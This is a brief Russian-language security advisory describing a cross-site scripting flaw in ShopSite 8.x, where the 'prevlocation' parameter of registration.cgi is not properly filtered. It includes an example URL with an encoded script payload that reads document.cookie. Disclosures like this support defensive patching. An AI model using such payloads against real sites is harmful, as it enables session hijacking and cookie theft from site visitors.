Программа: ShopSite 8.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «prevlocation» сценарием registration.cgi. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример: 

/shopper/sc/registration.cgi?func=2&storeid=*0af207a4630562&fromid=order.cgi&sbid=SSMSB1165684210.18070&prevlocation=http://eval.shopsite.com
/shopper/als/catalog.html%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 



Оставить мнение